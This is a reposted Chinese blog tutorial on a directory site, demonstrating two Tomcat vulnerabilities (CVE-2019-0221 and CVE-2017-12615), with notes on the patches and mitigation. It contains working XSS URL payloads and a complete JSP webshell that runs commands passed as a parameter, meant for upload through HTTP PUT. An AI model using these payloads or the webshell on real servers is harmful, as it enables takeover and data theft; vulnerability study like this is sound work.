亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.430618.com 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

Tomcat是一個(gè)開源的輕量級(jí)Web應(yīng)用服務(wù)器,在我們平常工作過程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術(shù)也會(huì)去閱讀學(xué)習(xí)Tomcat的源碼。但正如著名詩人李白所說的:世界上本沒有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。

今天我們選擇兩個(gè)比較直觀的Tomcat漏洞去模擬整個(gè)漏洞被攻擊的過程,以及漏洞為什么會(huì)產(chǎn)生,Tomcat大神們又是如何應(yīng)對(duì)的。

【攻擊一:XSS攻擊】

一、SSI技術(shù)說明

首先演示的漏洞和Tomcat的SSI功能有關(guān),SSI是什么

SSI技術(shù),也叫作Serve Side Includes,SSI(服務(wù)器端包含)是放置在html頁面中的指令,并在服務(wù)頁面時(shí)在服務(wù)器上對(duì)其進(jìn)行評(píng)估。它們使您可以將動(dòng)態(tài)生成的內(nèi)容添加到現(xiàn)有的HTML頁面,而不必通過CGI程序或其他動(dòng)態(tài)技術(shù)來提供整個(gè)頁面。使用SSI技術(shù)文件默認(rèn)的后綴名為.shtml;

舉例:我們可以將指令放置到現(xiàn)有的HTML頁面中,例如:

!--#echo var="DATE_LOCAL" -->

當(dāng)該頁面被執(zhí)行時(shí),將會(huì)顯示如下結(jié)果

Sunday, 22-March-2020 18:28:54 GMT

SSI最常見的用途之一:輸出CGI程序的結(jié)果,例如``命中計(jì)數(shù)器''。關(guān)于該技術(shù)更為詳細(xì)的說明參見:http://httpd.Apache.org/docs/current/howto/ssi.html

二、為Tomcat開啟SSI

  1. 準(zhǔn)備好JRE、tomcat環(huán)境,我選擇的是“apache-tomcat-9.0.10” (該漏洞受影響的版本有:Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 )
  2. 修改conf/context.xml第19行,開啟權(quán)限
<Context privileged="true">
  1. 修改confweb.xml,開啟SSI Servlet。該段代碼默認(rèn)是被注釋掉的,我們刪除注釋即可,代碼在310-322行。
<servlet>
        <servlet-name>ssi</servlet-name>
        <servlet-class>
          org.apache.catalina.ssi.SSIServlet
        </servlet-class>
        <init-param>
          <param-name>buffered</param-name>
          <param-value>1</param-value>
        </init-param>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>expires</param-name>
          <param-value>666</param-value>
        </init-param>
        <init-param>
          <param-name>isVirtualWebAppRelative</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>4</load-on-startup>
    </servlet>

去掉關(guān)于ssi配置的注釋 422-425行

  <servlet-mapping>
        <servlet-name>ssi</servlet-name>
        <url-pattern>*.shtml</url-pattern>
    </servlet-mapping>
  1. 在根目錄下添加madashu_env.shtml(習(xí)慣性命名為printEnv.shtml)文件,位于webapps/ROOT/ssi/
<html><head><title></title><body>
Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>
Env: <!--#printenv -->
</body></html>
  1. 啟動(dòng)Tomcat即可

三、發(fā)起攻擊

  1. 我們輸入以下url看下效果
http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

2. XSS注入

http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E

攻擊成功,頁面展示如下。

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

通過這種方式我們使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁程序,攻擊者還可能得到包括但不限于更高的權(quán)限(如執(zhí)行一些操作)、私密網(wǎng)頁內(nèi)容、會(huì)話和cookie等各種內(nèi)容。

四、源碼分析

漏洞產(chǎn)生后,Tomcat大神們迅速修復(fù)了該漏洞,我們從Github上找到當(dāng)時(shí)的代碼修復(fù)提交記錄:點(diǎn)擊查看commit

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

說真的,當(dāng)時(shí)看到這段修復(fù)代碼我是驚呆了,這是什么騷操作!!!“entity”又是什么鬼!!!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

于是接下往下翻代碼:

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

這個(gè)地方將我們輸入的變量值直接輸出到了網(wǎng)頁,很明顯剛剛的entity應(yīng)該是進(jìn)行了轉(zhuǎn)碼。我們找到SSIMediator.JAVA文件,路徑org.apache.catalina.ssi. SSIMediator

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

這樣我們一下子就明白過來了,當(dāng)發(fā)現(xiàn)是“entity”編碼,會(huì)將輸入的內(nèi)容進(jìn)行Escape,從而避免了XSS。估計(jì)大神們當(dāng)時(shí)也是緊急出了個(gè)hotfix版本,直接把參數(shù)寫死成“entity”。還有作為Web服務(wù)器,大神們竟然也會(huì)犯這么低級(jí)別的錯(cuò)誤,所以這也解釋了為什么不存在0Bug的系統(tǒng),哈哈!去翻看最新的SSIPrintenv.java文件,已經(jīng)把“entity”定義成常量了,這才專業(yè)嘛!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

 

【攻擊二:遠(yuǎn)程代碼執(zhí)行】

接下來再簡(jiǎn)單演示下遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞為高危漏洞,即使是非默認(rèn)配置,但是一旦存在漏洞,那么攻擊者可以成功上傳 Webshell,并控制服務(wù)器。

  1. 通過put方式上傳文件,請(qǐng)求進(jìn)行中時(shí)進(jìn)行攔截:
  2. 生成惡意文件,取名叫jiansheng.jsp
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
  1. 遠(yuǎn)程上傳成功,接下來就可以愉快地在這個(gè)不屬于我們自己的tomcat里玩耍了
  2. 整個(gè)代碼也是比較簡(jiǎn)單的,可以翻看JspServlet.java,這里就不做演示了。
    說明:該漏洞影響范圍非常廣,從 5.x 到 9.x 全部中槍。最好的解決方式是將 conf/web.xml 中對(duì)于 DefaultServlet 的 readonly 設(shè)置為 true。

結(jié)語

興趣是最好的老師,我們通過去看大佬們掉過的坑,寫過的代碼,站在巨人的肩膀人可以更快速地提升自己。

有興趣的小伙伴可以去看看Tomcat已爆出的漏洞:http://tomcat.apache.org/security-9.html本次演示的兩個(gè)漏洞分別是CVE-2019-0221,CVE-2017-12615。

作者:碼大叔

來源:https://www.cnblogs.com/madashu/p/12550149.html

分享到:
標(biāo)簽:服務(wù)器 Tomcat
用戶無頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績?cè)u(píng)定